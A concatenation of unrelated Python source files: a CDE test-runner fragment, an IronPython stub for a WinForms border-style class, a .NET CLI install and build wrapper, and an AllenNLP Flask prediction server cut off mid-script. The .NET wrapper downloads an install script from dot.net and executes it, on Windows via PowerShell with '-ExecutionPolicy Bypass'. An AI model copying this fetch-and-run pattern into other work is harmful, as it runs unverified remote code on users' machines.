(stdout, stderr) = Popen(["rm", "-rf", tmp_test_rootdir], stdout=PIPE, stderr=PIPE).communicate()
assert not stdout and not stderr
(stdout, stderr) = Popen(["cp", "-aR", full_pwd, "/tmp"], stdout=PIPE, stderr=PIPE).communicate()
assert not stdout and not stderr
# rename full_pwd to make it impossible for the new version in /tmp
# to reference already-existing files in full_pwd (a harsher test!)
try:
os.rename(full_pwd, full_pwd_renamed)
# run the cde-exec test in tmp_test_dir
os.chdir(tmp_test_dir)
(stdout, stderr) = Popen([CDE_EXEC] + argv, stdout=PIPE, stderr=PIPE).communicate()
#print '=== prev_stdout:', prev_stdout
#print '=== stdout:', stdout
assert stdout == prev_stdout
#print '=== prev_stderr:', prev_stderr
#print '=== stderr:', stderr
assert stderr == prev_stderr
finally:
# rename it back to be nice :)
os.rename(full_pwd_renamed, full_pwd)
os.chdir(full_pwd) # make sure to chdir back!!!
finally:
# remove the version in tmp
(stdout, stderr) = Popen(["rm", "-rf", tmp_test_rootdir], stdout=PIPE, stderr=PIPE).communicate()
def generic_test_runner(argv, checker_func, skip_generic_lib_checks=False, clear_cde_options=True):
# careful!!!
os.system('rm -rf cde-package')
if clear_cde_options:
os.system('rm -f cde.options')
time.sleep(0.3) # to give os.system some time to work :)
(stdout, stderr) = run_cde(argv)
checker_func()
if not skip_generic_lib_checks:
generic_lib_checks()
run_and_cmp_cde_exec(argv, stdout, stderr)
|
py
|
1a5ee44b23d43c0589a0e604399873b189b50d2f
|
class DataGridViewAdvancedBorderStyle(object,ICloneable):
"""
Contains border styles for the cells in a System.Windows.Forms.DataGridView control.
DataGridViewAdvancedBorderStyle()
"""
def Equals(self,other):
"""
Equals(self: DataGridViewAdvancedBorderStyle,other: object) -> bool
Determines whether the specified object is equal to the current
System.Windows.Forms.DataGridViewAdvancedBorderStyle.
other: An System.Object to be compared.
Returns: true if other is a System.Windows.Forms.DataGridViewAdvancedBorderStyle and the values for the
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Top,
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Bottom,
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Left,and
System.Windows.Forms.DataGridViewAdvancedBorderStyle.Right properties are equal to their
counterpart in the current System.Windows.Forms.DataGridViewAdvancedBorderStyle; otherwise,
false.
"""
pass
def GetHashCode(self):
""" GetHashCode(self: DataGridViewAdvancedBorderStyle) -> int """
pass
def ToString(self):
"""
ToString(self: DataGridViewAdvancedBorderStyle) -> str
Returns a string that represents the System.Windows.Forms.DataGridViewAdvancedBorderStyle.
Returns: A string that represents the System.Windows.Forms.DataGridViewAdvancedBorderStyle.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __ne__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __str__(self,*args):
pass
All=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the border style for all of the borders of a cell.
Get: All(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: All(self: DataGridViewAdvancedBorderStyle)=value
"""
Bottom=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the style for the bottom border of a cell.
Get: Bottom(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Bottom(self: DataGridViewAdvancedBorderStyle)=value
"""
Left=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the left border of a cell.
Get: Left(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Left(self: DataGridViewAdvancedBorderStyle)=value
"""
Right=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the right border of a cell.
Get: Right(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Right(self: DataGridViewAdvancedBorderStyle)=value
"""
Top=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the style for the top border of a cell.
Get: Top(self: DataGridViewAdvancedBorderStyle) -> DataGridViewAdvancedCellBorderStyle
Set: Top(self: DataGridViewAdvancedBorderStyle)=value
"""
|
py
|
1a5ee45fa9bb69d97a95caa0154875dfa6b9801e
|
#!/usr/bin/env python3
"""
Contains the functionality around DotNet Cli.
"""
from argparse import Action, ArgumentParser, ArgumentTypeError, ArgumentError
from collections import namedtuple
from glob import iglob
from json import loads
from logging import getLogger
from os import chmod, environ, listdir, makedirs, path, pathsep
from re import search
from shutil import rmtree
from stat import S_IRWXU
from subprocess import check_output
from sys import argv, platform
from typing import Tuple
from urllib.parse import urlparse
from urllib.request import urlopen, urlretrieve
from performance.common import get_repo_root_path
from performance.common import get_tools_directory
from performance.common import push_dir
from performance.common import RunCommand
from performance.common import validate_supported_runtime
from performance.logger import setup_loggers
from channel_map import ChannelMap
def info(verbose: bool) -> None:
"""
Executes `dotnet --info` in order to get the .NET Core information from the
dotnet executable.
"""
cmdline = ['dotnet', '--info']
RunCommand(cmdline, verbose=verbose).run()
def __log_script_header(message: str):
message_length = len(message)
getLogger().info('-' * message_length)
getLogger().info(message)
getLogger().info('-' * message_length)
CSharpProjFile = namedtuple('CSharpProjFile', [
'file_name',
'working_directory'
])
class FrameworkAction(Action):
'''
Used by the ArgumentParser to represent the information needed to parse the
supported .NET frameworks argument from the command line.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values:
setattr(namespace, self.dest, list(set(values)))
@staticmethod
def get_target_framework_moniker(framework: str) -> str:
'''
Translates framework name to target framework moniker (TFM)
To run CoreRT benchmarks we need to run the host BDN process as latest
.NET Core the host process will build and run CoreRT benchmarks
'''
return 'netcoreapp5.0' if framework == 'corert' else framework
@staticmethod
def get_target_framework_monikers(frameworks: list) -> list:
'''
Translates framework names to target framework monikers (TFM)
Required to run CoreRT benchmarks where the host process must be .NET
Core, not CoreRT.
'''
monikers = [
FrameworkAction.get_target_framework_moniker(framework)
for framework in frameworks
]
# ['netcoreapp5.0', 'corert'] should become ['netcoreapp5.0']
return list(set(monikers))
class VersionsAction(Action):
'''
Argument parser helper class used to validates the dotnet-versions input.
'''
def __call__(self, parser, namespace, values, option_string=None):
if values:
for version in values:
if not search(r'^\d\.\d+\.\d+', version):
raise ArgumentTypeError(
'Version "{}" is in the wrong format'.format(version))
setattr(namespace, self.dest, values)
class CompilationAction(Action):
'''
Tiered: (Default)
NoTiering: Tiering is disabled, but R2R code is not disabled.
This includes R2R code, useful for comparison against Tiered and
FullyJittedNoTiering for changes to R2R code or tiering.
Default: Don't set any environment variables. Use what the compiler views
as the default.
FullyJittedNoTiering: Tiering and R2R are disabled.
This is JIT-only, useful for comparison against Tiered and NoTiering
for changes to R2R code or tiering.
MinOpt:
Uses minopt-JIT for methods that do not have pregenerated code, useful
for startup time comparisons in scenario benchmarks that include a
startup time measurement (probably not for microbenchmarks), probably
not useful for a PR.
For PRs it is recommended to kick off a Tiered run, and being able to
manually kick-off NoTiering and FullyJittedNoTiering modes when needed.
'''
# TODO: Would 'Default' make sense for .NET Framework / CoreRT / Mono?
# TODO: Should only be required for benchmark execution under certain tools
TIERED = 'Tiered'
NO_TIERING = 'NoTiering'
DEFAULT = 'Default'
FULLY_JITTED_NO_TIERING = 'FullyJittedNoTiering'
MIN_OPT = 'MinOpt'
def __call__(self, parser, namespace, values, option_string=None):
if values:
if values not in CompilationAction.modes():
raise ArgumentTypeError('Unknown mode: {}'.format(values))
setattr(namespace, self.dest, values)
@staticmethod
def __set_mode(mode: str) -> None:
# Remove potentially set environments.
COMPLUS_ENVIRONMENTS = [
'COMPlus_JITMinOpts',
'COMPlus_ReadyToRun',
'COMPlus_TieredCompilation',
'COMPlus_ZapDisable',
]
for complus_environment in COMPLUS_ENVIRONMENTS:
if complus_environment in environ:
environ.pop(complus_environment)
# Configure .NET Runtime
if mode == CompilationAction.TIERED:
environ['COMPlus_TieredCompilation'] = '1'
elif mode == CompilationAction.NO_TIERING:
environ['COMPlus_TieredCompilation'] = '0'
elif mode == CompilationAction.FULLY_JITTED_NO_TIERING:
environ['COMPlus_ReadyToRun'] = '0'
environ['COMPlus_TieredCompilation'] = '0'
environ['COMPlus_ZapDisable'] = '1'
elif mode == CompilationAction.MIN_OPT:
environ['COMPlus_JITMinOpts'] = '1'
environ['COMPlus_TieredCompilation'] = '0'
elif mode != CompilationAction.DEFAULT:
raise ArgumentTypeError('Unknown mode: {}'.format(mode))
@staticmethod
def validate(usr_mode: str) -> str:
'''Validate user input.'''
requested_mode = None
for mode in CompilationAction.modes():
if usr_mode.casefold() == mode.casefold():
requested_mode = mode
break
if not requested_mode:
raise ArgumentTypeError('Unknown mode: {}'.format(usr_mode))
CompilationAction.__set_mode(requested_mode)
return requested_mode
@staticmethod
def modes() -> list:
'''Available .NET Performance modes.'''
return [
CompilationAction.DEFAULT,
CompilationAction.TIERED,
CompilationAction.NO_TIERING,
CompilationAction.FULLY_JITTED_NO_TIERING,
CompilationAction.MIN_OPT
]
@staticmethod
def noenv() -> str:
'''Default .NET performance mode.'''
return CompilationAction.modes()[0] # No environment set
@staticmethod
def help_text() -> str:
'''Gets the help string describing the different compilation modes.'''
return '''Different compilation modes that can be set to change the
.NET compilation behavior. The default configurations have changed between
releases of .NET. These flags enable ensuring consistency when running
more than one runtime. The different modes are: {}: no
environment variables are set; {}: tiering is enabled.
{}: tiering is disabled, but includes R2R code, and it is useful for
comparison against Tiered; {}: This is JIT-only, useful for comparison
against Tiered and NoTier for changes to R2R code or tiering; {}: uses
minopt-JIT for methods that do not have pregenerated code, and useful
for startup time comparisons in scenario benchmarks that include a
startup time measurement (probably not for microbenchmarks), probably
not useful for a PR.'''.format(
CompilationAction.DEFAULT,
CompilationAction.TIERED,
CompilationAction.NO_TIERING,
CompilationAction.FULLY_JITTED_NO_TIERING,
CompilationAction.MIN_OPT
)
class CSharpProject:
'''
This is a class wrapper around the `dotnet` command line interface.
Remark: It assumes dotnet is already in the PATH.
'''
def __init__(self, project: CSharpProjFile, bin_directory: str):
if not project.file_name:
raise TypeError('C# file name cannot be null.')
if not project.working_directory:
raise TypeError('C# working directory cannot be null.')
if not bin_directory:
raise TypeError('bin folder cannot be null.')
self.__csproj_file = path.abspath(project.file_name)
self.__working_directory = path.abspath(project.working_directory)
self.__bin_directory = bin_directory
if not path.isdir(self.__working_directory):
raise ValueError(
'Specified working directory: {}, does not exist.'.format(
self.__working_directory
)
)
if not path.isfile(self.__csproj_file):
raise ValueError(
'Specified project file: {}, does not exist.'.format(
self.__csproj_file
)
)
@property
def working_directory(self) -> str:
'''Gets the working directory for the dotnet process to be started.'''
return self.__working_directory
@property
def csproj_file(self) -> str:
'''Gets the project file to run the dotnet cli against.'''
return self.__csproj_file
@property
def project_name(self) -> str:
'''Gets the project name.'''
return path.splitext(path.basename(self.__csproj_file))[0]
@property
def bin_path(self) -> str:
'''Gets the directory in which the built binaries will be placed.'''
return self.__bin_directory
def restore(self,
packages_path: str,
verbose: bool,
runtime_identifier: str = None) -> None:
'''
Calls dotnet to restore the dependencies and tools of the specified
project.
Keyword arguments:
packages_path -- The directory to restore packages to.
'''
if not packages_path:
raise TypeError('Unspecified packages directory.')
cmdline = [
'dotnet', 'restore',
self.csproj_file,
'--packages', packages_path
]
if runtime_identifier:
cmdline += ['--runtime', runtime_identifier]
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
def build(self,
configuration: str,
verbose: bool,
packages_path: str,
target_framework_monikers: list = None,
output_to_bindir: bool = False,
runtime_identifier: str = None,
*args) -> None:
'''Calls dotnet to build the specified project.'''
if not target_framework_monikers: # Build all supported frameworks.
cmdline = [
'dotnet', 'build',
self.csproj_file,
'--configuration', configuration,
'--no-restore',
"/p:NuGetPackageRoot={}".format(packages_path),
]
if output_to_bindir:
cmdline = cmdline + ['--output', self.__bin_directory]
if runtime_identifier:
cmdline = cmdline + ['--runtime', runtime_identifier]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
else: # Only build specified frameworks
for target_framework_moniker in target_framework_monikers:
cmdline = [
'dotnet', 'build',
self.csproj_file,
'--configuration', configuration,
'--framework', target_framework_moniker,
'--no-restore',
"/p:NuGetPackageRoot={}".format(packages_path),
]
if output_to_bindir:
cmdline = cmdline + ['--output', self.__bin_directory]
if runtime_identifier:
cmdline = cmdline + ['--runtime', runtime_identifier]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
@staticmethod
def new(template: str,
output_dir: str,
bin_dir: str,
verbose: bool,
working_directory: str,
force: bool = False,
exename: str = None,
language: str = None
):
'''
Creates a new project with the specified template
'''
cmdline = [
'dotnet', 'new',
template,
'--output', output_dir,
'--no-restore'
]
if force:
cmdline += ['--force']
if exename:
cmdline += ['--name', exename]
if language:
cmdline += ['--language', language]
RunCommand(cmdline, verbose=verbose).run(
working_directory
)
# the file could be any project type. let's guess.
project_type = 'csproj'
if language == 'vb':
project_type = 'vbproj'
return CSharpProject(CSharpProjFile(path.join(output_dir, '%s.%s' % (exename or output_dir, project_type)),
working_directory),
bin_dir)
def publish(self,
configuration: str,
output_dir: str,
verbose: bool,
packages_path,
target_framework_moniker: str = None,
runtime_identifier: str = None,
*args
) -> None:
'''
Invokes publish on the specified project
'''
cmdline = [
'dotnet', 'publish',
self.csproj_file,
'--configuration', configuration,
'--output', output_dir,
"/p:NuGetPackageRoot={}".format(packages_path)
]
if runtime_identifier:
cmdline += ['--runtime', runtime_identifier]
if target_framework_moniker:
cmdline += ['--framework', target_framework_moniker]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory
)
@staticmethod
def __print_complus_environment() -> None:
getLogger().info('-' * 50)
getLogger().info('Dumping COMPlus environment:')
COMPLUS_PREFIX = 'COMPlus'
for env in environ:
if env[:len(COMPLUS_PREFIX)].lower() == COMPLUS_PREFIX.lower():
getLogger().info(' "%s=%s"', env, environ[env])
getLogger().info('-' * 50)
def run(self,
configuration: str,
target_framework_moniker: str,
verbose: bool,
*args) -> None:
'''
Calls dotnet to run a .NET project output.
'''
CSharpProject.__print_complus_environment()
cmdline = [
'dotnet', 'run',
'--project', self.csproj_file,
'--configuration', configuration,
'--framework', target_framework_moniker,
'--no-restore', '--no-build',
]
if args:
cmdline = cmdline + list(args)
RunCommand(cmdline, verbose=verbose).run(
self.working_directory)
def get_framework_version(framework: str) -> str:
groups = search(r"^netcoreapp(\d)\.(\d)$", framework)
if not groups:
raise ValueError("Unknown target framework: {}".format(framework))
FrameworkVersion = namedtuple('FrameworkVersion', ['major', 'minor'])
version = FrameworkVersion(int(groups.group(1)), int(groups.group(2)))
return version
def get_base_path(dotnet_path: str = None) -> str:
"""Gets the dotnet Host version from the `dotnet --info` command."""
if not dotnet_path:
dotnet_path = 'dotnet'
output = check_output([dotnet_path, '--info'])
for line in output.splitlines():
decoded_line = line.decode('utf-8')
# The .NET Command Line Tools `--info` had a different output in 2.0
# This line seems commons in all Cli, so we can use the base path to
# get information about the .NET SDK/Runtime
groups = search(r"^ +Base Path\: +(.+)$", decoded_line)
if groups:
break
if not groups:
raise RuntimeError(
'Did not find "Base Path:" entry on the `dotnet --info` command'
)
return groups.group(1)
def get_sdk_path(dotnet_path: str = None) -> str:
base_path = get_base_path(dotnet_path)
sdk_path = path.abspath(path.join(base_path, '..'))
return sdk_path
def get_dotnet_path() -> str:
base_path = get_base_path(None)
dotnet_path = path.abspath(path.join(base_path, '..', '..'))
return dotnet_path
def get_dotnet_version(
framework: str,
dotnet_path: str = None,
sdk_path: str = None) -> str:
version = get_framework_version(framework)
sdk_path = get_sdk_path(dotnet_path) if sdk_path is None else sdk_path
sdks = [
d for d in listdir(sdk_path) if path.isdir(path.join(sdk_path, d))
]
sdks.sort(reverse=True)
# Determine the SDK being used.
# Attempt 1: Try to use exact match.
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format(version.major, version.minor))), None)
if not sdk:
# Attempt 2: Increase the minor version by 1 and retry.
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format(version.major, version.minor + 1))), None)
if not sdk:
sdk = next((f for f in sdks if f.startswith(
"{}.{}".format('5', '0'))), None)
if not sdk:
raise RuntimeError(
"Unable to determine the .NET SDK used for {}".format(framework)
)
return sdk
def get_dotnet_sdk(
framework: str,
dotnet_path: str = None,
sdk: str = None) -> str:
"""Gets the dotnet Host commit sha from the `dotnet --info` command."""
sdk_path = get_sdk_path(dotnet_path)
sdk = get_dotnet_version(framework, dotnet_path,
sdk_path) if sdk is None else sdk
with open(path.join(sdk_path, sdk, '.version')) as sdk_version_file:
return sdk_version_file.readline().strip()
raise RuntimeError("Unable to retrieve information about the .NET SDK.")
def get_repository(repository: str) -> Tuple[str, str]:
url_path = urlparse(repository).path
tokens = url_path.split("/")
if len(tokens) != 3:
raise ValueError('Unable to determine owner and repo from url.')
owner = tokens[1]
repo = tokens[2]
return owner, repo
def get_commit_date(
framework: str,
commit_sha: str,
repository: str = None
) -> str:
'''
Gets the .NET Core committer date using the GitHub Web API from the
repository.
'''
if not framework:
raise ValueError('Target framework was not defined.')
if not commit_sha:
raise ValueError('.NET Commit sha was not defined.')
url = None
urlformat = 'https://api.github.com/repos/%s/%s/commits/%s'
if repository is None:
# The origin of the repo where the commit belongs to has changed
# between release. Here we attempt to naively guess the repo.
core_sdk_frameworks = ['netcoreapp3.0', 'netcoreapp3.1', 'netcoreapp5.0']
repo = 'core-sdk' if framework in core_sdk_frameworks else 'cli'
url = urlformat % ('dotnet', repo, commit_sha)
else:
owner, repo = get_repository(repository)
url = urlformat % (owner, repo, commit_sha)
build_timestamp = None
with urlopen(url) as response:
getLogger().info("Commit: %s", url)
item = loads(response.read().decode('utf-8'))
build_timestamp = item['commit']['committer']['date']
if not build_timestamp:
raise RuntimeError(
'Could not get timestamp for commit %s' % commit_sha)
return build_timestamp
def get_build_directory(
bin_directory: str,
project_name: str,
configuration: str,
target_framework_moniker: str) -> None:
'''
Gets the output directory where the built artifacts are in with
respect to the specified bin_directory.
'''
with push_dir(bin_directory):
return path.join(
bin_directory,
__find_build_directory(
configuration=configuration,
project_name=project_name,
target_framework_moniker=target_framework_moniker,
)
)
def __find_build_directory(
configuration: str,
project_name: str,
target_framework_moniker: str) -> str:
'''
Attempts to get the output directory where the built artifacts are in
with respect to the current working directory.
'''
pattern = '**/{ProjectName}/**/{Configuration}/{TargetFramework}'.format(
ProjectName=project_name,
Configuration=configuration,
TargetFramework=target_framework_moniker
)
for path_name in iglob(pattern, recursive=True):
if path.isdir(path_name):
return path_name
raise ValueError(
'Unable to determine directory for the specified pattern.')
def __get_directory(architecture: str) -> str:
'''Gets the default directory where dotnet is to be installed.'''
return path.join(get_tools_directory(), 'dotnet', architecture)
def remove_dotnet(architecture: str) -> str:
'''
Removes the dotnet installed in the tools directory associated with the
specified architecture.
'''
rmtree(__get_directory(architecture))
def shutdown_server(verbose:bool) -> None:
'''
Shuts down the dotnet server
'''
cmdline = [
'dotnet', 'build-server', 'shutdown'
]
RunCommand(cmdline, verbose=verbose).run(
get_repo_root_path())
def install(
architecture: str,
channels: list,
versions: str,
verbose: bool,
install_dir: str = None) -> None:
'''
Downloads dotnet cli into the tools folder.
'''
__log_script_header("Downloading DotNet Cli")
if not install_dir:
install_dir = __get_directory(architecture)
if not path.exists(install_dir):
makedirs(install_dir)
getLogger().info("DotNet Install Path: '%s'", install_dir)
# Download appropriate dotnet install script
dotnetInstallScriptExtension = '.ps1' if platform == 'win32' else '.sh'
dotnetInstallScriptName = 'dotnet-install' + dotnetInstallScriptExtension
url = 'https://dot.net/v1/'
dotnetInstallScriptUrl = url + dotnetInstallScriptName
dotnetInstallScriptPath = path.join(install_dir, dotnetInstallScriptName)
getLogger().info('Downloading %s', dotnetInstallScriptUrl)
urlretrieve(dotnetInstallScriptUrl, dotnetInstallScriptPath)
if platform != 'win32':
chmod(dotnetInstallScriptPath, S_IRWXU)
dotnetInstallInterpreter = [
'powershell.exe',
'-NoProfile',
'-ExecutionPolicy', 'Bypass',
dotnetInstallScriptPath
] if platform == 'win32' else [dotnetInstallScriptPath]
# If Version is supplied, pull down the specified version
common_cmdline_args = dotnetInstallInterpreter + [
'-InstallDir', install_dir,
'-Architecture', architecture
]
# Install Runtime/SDKs
if versions:
for version in versions:
cmdline_args = common_cmdline_args + ['-Version', version]
RunCommand(cmdline_args, verbose=verbose).run(
get_repo_root_path()
)
# Only check channels if versions are not supplied.
# When we supply a version, but still pull down with -Channel, we will use
# whichever sdk is newer. So if we are trying to check an older version,
# or if there is a new version between when we start a run and when we actually
# run, we will be testing the "wrong" version, ie, not the version we specified.
if (not versions) and channels:
for channel in channels:
cmdline_args = common_cmdline_args + ['-Channel', channel]
RunCommand(cmdline_args, verbose=verbose).run(
get_repo_root_path()
)
# Set DotNet Cli environment variables.
environ['DOTNET_CLI_TELEMETRY_OPTOUT'] = '1'
environ['DOTNET_MULTILEVEL_LOOKUP'] = '0'
environ['UseSharedCompilation'] = 'false'
environ['DOTNET_ROOT'] = install_dir
# Add installed dotnet cli to PATH
environ["PATH"] = install_dir + pathsep + environ["PATH"]
# If we have copied dotnet from a different machine, then it may not be
# marked as executable. Fix this.
if platform != 'win32':
chmod(path.join(install_dir, 'dotnet'), S_IRWXU)
def __add_arguments(parser: ArgumentParser) -> ArgumentParser:
'''
Adds new arguments to the specified ArgumentParser object.
'''
if not isinstance(parser, ArgumentParser):
raise TypeError('Invalid parser.')
SUPPORTED_ARCHITECTURES = [
'x64', # Default architecture
'x86',
'arm',
'arm64',
]
parser.add_argument(
'--architecture',
dest='architecture',
required=False,
default=SUPPORTED_ARCHITECTURES[0],
choices=SUPPORTED_ARCHITECTURES,
help='Architecture of DotNet Cli binaries to be installed.'
)
parser.add_argument(
'--dotnet-versions',
dest="dotnet_versions",
required=False,
nargs='+',
default=[],
action=VersionsAction,
help='Version of the dotnet cli to install in the A.B.C format'
)
return parser
def add_arguments(parser: ArgumentParser) -> ArgumentParser:
'''
Adds new arguments to the specified ArgumentParser object.
'''
parser = __add_arguments(parser)
# .NET Compilation modes.
parser.add_argument(
'--dotnet-compilation-mode',
dest='dotnet_compilation_mode',
required=False,
action=CompilationAction,
choices=CompilationAction.modes(),
default=CompilationAction.noenv(),
type=CompilationAction.validate,
help='{}'.format(CompilationAction.help_text())
)
return parser
def __process_arguments(args: list):
parser = ArgumentParser(
description='DotNet Cli wrapper.',
allow_abbrev=False
)
subparsers = parser.add_subparsers(
title='Subcommands',
description='Supported DotNet Cli subcommands',
dest='install',
)
subparsers.required = True
install_parser = subparsers.add_parser(
'install',
allow_abbrev=False,
help='Installs dotnet cli',
)
install_parser.add_argument(
'--channels',
dest='channels',
required=False,
nargs='+',
default=['master'],
choices= ChannelMap.get_supported_channels(),
help='Download DotNet Cli from the Channel specified.'
)
install_parser = __add_arguments(install_parser)
# private install arguments.
install_parser.add_argument(
'--install-dir',
dest='install_dir',
required=False,
type=str,
help='''Path to where to install dotnet. Note that binaries will be '''
'''placed directly in a given directory.''',
)
install_parser.add_argument(
'-v', '--verbose',
required=False,
default=False,
action='store_true',
help='Turns on verbosity (default "False")',
)
return parser.parse_args(args)
def __main(args: list) -> int:
validate_supported_runtime()
args = __process_arguments(args)
setup_loggers(verbose=args.verbose)
install(
architecture=args.architecture,
channels=args.channels,
versions=args.dotnet_versions,
verbose=args.verbose,
install_dir=args.install_dir,
)
if __name__ == "__main__":
__main(argv[1:])
|
py
|
1a5ee49398cef842d883f655125bd7310a7c4ba8
|
"""
A `Flask <http://flask.pocoo.org/>`_ server for serving predictions
from a single AllenNLP model. It also includes a very, very bare-bones
web front-end for exploring predictions (or you can provide your own).
For example, if you have your own predictor and model in the `my_stuff` package,
and you want to use the default HTML, you could run this like
```
python -m allennlp.service.server_simple \
--archive-path allennlp/tests/fixtures/bidaf/serialization/model.tar.gz \
--predictor machine-comprehension \
--title "Demo of the Machine Comprehension Text Fixture" \
--field-name question --field-name passage
```
"""
from typing import List, Callable
import argparse
import json
import logging
import os
from string import Template
import sys
import base64
import io
from flask import Flask, request, flash, Response, jsonify, send_file, send_from_directory
from flask import Flask, flash, request, redirect, url_for
from werkzeug.utils import secure_filename
from flask_cors import CORS
from gevent.pywsgi import WSGIServer
import numpy as np
import cv2
from PIL import Image
from allennlp.common import JsonDict
from allennlp.common.checks import check_for_gpu
from allennlp.common.util import import_submodules
from allennlp.models.archival import load_archive
from allennlp.predictors import Predictor
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ServerError(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
error_dict = dict(self.payload or ())
error_dict['message'] = self.message
return error_dict
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
UPLOAD_FOLDER = '/home/sethah/ssd/tmp/'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
def make_app(predictor: Predictor,
field_names: List[str] = None,
static_dir: str = None,
task: str = None,
sanitizer: Callable[[JsonDict], JsonDict] = None,
title: str = "AllenNLP Demo") -> Flask:
"""
Creates a Flask app that serves up the provided ``Predictor``
along with a front-end for interacting with it.
If you want to use the built-in bare-bones HTML, you must provide the
field names for the inputs (which will be used both as labels
and as the keys in the JSON that gets sent to the predictor).
If you would rather create your own HTML, call it index.html
and provide its directory as ``static_dir``. In that case you
don't need to supply the field names -- that information should
be implicit in your demo site. (Probably the easiest thing to do
is just start with the bare-bones HTML and modify it.)
In addition, if you want somehow transform the JSON prediction
(e.g. by removing probabilities or logits)
you can do that by passing in a ``sanitizer`` function.
"""
if static_dir is not None:
static_dir = os.path.abspath(static_dir)
if not os.path.exists(static_dir):
logger.error("app directory %s does not exist, aborting", static_dir)
sys.exit(-1)
elif static_dir is None:
print("Neither build_dir nor field_names passed. Demo won't render on this port.\n"
"You must use nodejs + react app to interact with the server.")
app = Flask(__name__) # pylint: disable=invalid-name
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.errorhandler(ServerError)
def handle_invalid_usage(error: ServerError) -> Response: # pylint: disable=unused-variable
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/')
def index() -> Response: # pylint: disable=unused-variable
if static_dir is not None:
return send_file(os.path.join(static_dir, 'index.html'))
else:
html = _html(title, field_names, task)
return Response(response=html, status=200)
@app.route('/predict_batch', methods=['POST', 'OPTIONS'])
def predict_batch() -> Response: # pylint: disable=unused-variable
"""make a prediction using the specified model and return the results"""
if request.method == "OPTIONS":
return Response(response="", status=200)
data = request.get_json()
prediction = predictor.predict_batch_json(data)
if sanitizer is not None:
prediction = [sanitizer(p) for p in prediction]
return jsonify(prediction)
@app.route('/<path:path>')
def static_proxy(path: str) -> Response: # pylint: disable=unused-variable
if static_dir is not None:
return send_from_directory(static_dir, path)
else:
raise ServerError("static_dir not specified", 404)
@app.route('/predict', methods=['POST', 'OPTIONS'])
def predict() -> Response: # pylint: disable=unused-variable
data = request.data
decoded = base64.b64decode(data[23:])
stream = io.BytesIO(decoded)
img = Image.open(stream)
img = np.array(img).astype(np.uint8)
prediction = predictor.predict_json({'image': [int(x) for x in img.ravel().tolist()],
'image_shape': img.shape})
# print(prediction['boxes'])
return jsonify(prediction)
# prediction = predictor.predict_json(data)
# if sanitizer is not None:
# prediction = sanitizer(prediction)
#
# log_blob = {"inputs": data, "outputs": prediction}
# logger.info("prediction: %s", json.dumps(log_blob))
return app
def _get_predictor(args: argparse.Namespace) -> Predictor:
check_for_gpu(args.cuda_device)
archive = load_archive(args.archive_path,
weights_file=args.weights_file,
cuda_device=args.cuda_device,
overrides=args.overrides)
return Predictor.from_archive(archive, args.predictor)
def main(args):
# Executing this file with no extra options runs the simple service with the bidaf test fixture
# and the machine-comprehension predictor. There's no good reason you'd want
# to do this, except possibly to test changes to the stock HTML).
parser = argparse.ArgumentParser(description='Serve up a simple model')
parser.add_argument('--archive-path', type=str, required=True, help='path to trained archive file')
parser.add_argument('--predictor', type=str, required=True, help='name of predictor')
parser.add_argument('--weights-file', type=str,
help='a path that overrides which weights file to use')
parser.add_argument('--cuda-device', type=int, default=-1, help='id of GPU to use (if any)')
parser.add_argument('-o', '--overrides', type=str, default="",
help='a JSON structure used to override the experiment configuration')
parser.add_argument('--static-dir', type=str, help='serve index.html from this directory')
parser.add_argument('--title', type=str, help='change the default page title', default="AllenNLP Demo")
parser.add_argument('--field-name', type=str, action='append',
help='field names to include in the demo')
parser.add_argument('--port', type=int, default=8000, help='port to serve the demo on')
parser.add_argument('--classification', action='store_true')
parser.add_argument('--detection', action='store_true')
parser.add_argument('--include-package',
type=str,
action='append',
default=[],
help='additional packages to include')
args = parser.parse_args(args)
# Load modules
for package_name in args.include_package:
import_submodules(package_name)
predictor = _get_predictor(args)
field_names = args.field_name
task = None
if args.classification:
task = 'classification'
if args.detection:
task = 'detection'
app = make_app(predictor=predictor,
field_names=field_names,
static_dir=args.static_dir,
task=task,
title=args.title)
CORS(app)
http_server = WSGIServer(('0.0.0.0', args.port), app)
print(f"Model loaded, serving demo on port {args.port}")
http_server.serve_forever()
#
# HTML and Templates for the default bare-bones app are below
#
_CLASSIFIER_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
var i;
var canvas = document.getElementById("outputCanvas");
var ctx = canvas.getContext("2d");
ctx.font = "16px Arial";
var width = ctx.measureText(prediction['class']).width;
ctx.fillStyle="red";
